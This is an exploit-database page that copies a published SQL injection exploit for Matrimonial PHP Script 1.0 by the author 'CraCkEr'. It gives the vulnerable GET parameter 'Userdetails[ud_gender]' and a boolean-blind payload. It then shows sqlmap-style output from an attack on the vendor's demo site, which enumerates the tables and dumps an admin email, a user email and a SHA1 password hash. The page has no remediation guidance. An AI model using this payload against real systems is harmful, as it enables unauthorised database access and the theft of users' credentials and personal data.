Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080044

Below is a copy:

Matrimonial PHP Script 1.0 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                       [ Exploits ]                                   

:  Author   : CraCkEr                                                                  :
  Website  : uisort.com                                                               
  Vendor   : Uisort Technologies Pvt. Ltd.                                            
  Software : Matrimonial PHP Script v1.0       Matrimonial Script PHP tailored with   
  Demo     : stage.matrimic.in                 advanced features website              
  Vuln Type: Remote SQL Injection              & mobile apps from matrimic            
  Method   : GET                                                                      
  Impact   : Database Access                                                          
                                                                                      
 
                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise.                                                                    
                                                                                        

                                                                                      


Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
   loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y
       
   CryptoJob (Twitter) twitter.com/CryptozJob
   

                                      CraCkEr 2022                                   



GET parameter 'Userdetails[ud_gender]' is vulnerable

---
Parameter: Userdetails[ud_gender] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Userdetails[ud_gender]=1 AND 2636=2636
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0


[INFO] fetching current database
[INFO] retrieved: stage_db_qa


[INFO] fetching number of tables for database 'stage_db_qa'
Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache           |
| YiiLog             |
| mc_admin           |
| mc_blocklist       |
| mc_caste           |
| mc_city            |
| mc_cms             |
| mc_contact         |
| mc_contact_history |
| mc_country         |
| mc_currency        |
| mc_deleteprofile   |
| mc_education       |
| mc_feedback        |
| mc_gallery         |
| mc_height          |
| mc_horoscope       |
| mc_import_jobs     |
| mc_interest        |
| mc_language        |
| mc_message         |
| mc_occupation      |
| mc_partner         |
| mc_plan            |
| mc_profile_viewed  |
| mc_religion        |
| mc_searchlist      |
| mc_settings        |
| mc_shortlist       |
| mc_sms_history     |
| mc_state           |
| mc_subcaste        |
| mc_success_story   |
| mc_toungue         |
| mc_transaction     |
| mc_user            |
| mc_userdetails     |
+--------------------+


[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| admin_email  | varchar(32) |
| admin_id     | int(11)     |
| admin_name   | varchar(32) |
| admin_status | int(11)     |
+--------------+-------------+


[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email           | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1        | [email protected]\x81imic.com | Admin      | 1            |
+----------+-----------------------+------------+--------------+


[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| api_token              | varchar(255) |
| code                   | varchar(128) |
| device                 | varchar(32)  |
| user_activecode        | varchar(32)  |
| user_activedate        | datetime     |
| user_activestatus      | int(11)      |
| user_android_device_id | varchar(255) |
| user_email             | varchar(32)  |
| user_id                | int(11)      |
| user_ios_device_id     | varchar(255) |
| user_ipaddress         | varchar(32(  |
| user_lastlogin         | datetime     |
| user_mobile            | bigint(20)   |
| user_opensource        | varchar(32)  |
| user_password          | varchar(255) |
| user_salt              | varchar(64)  |
| user_status            | int(11)      |
| user_type              | int(11)      |
| user_userid            | int(11)      |
| user_verified_token    | varchar(255) |
+------------------------+--------------+


[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email         | user_password                            | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1       | [email protected] | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1         | 1           |
+---------+--------------------+------------------------------------------+-----------+-------------+
                                Possible Algorithms: SHA1


[-] Done

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.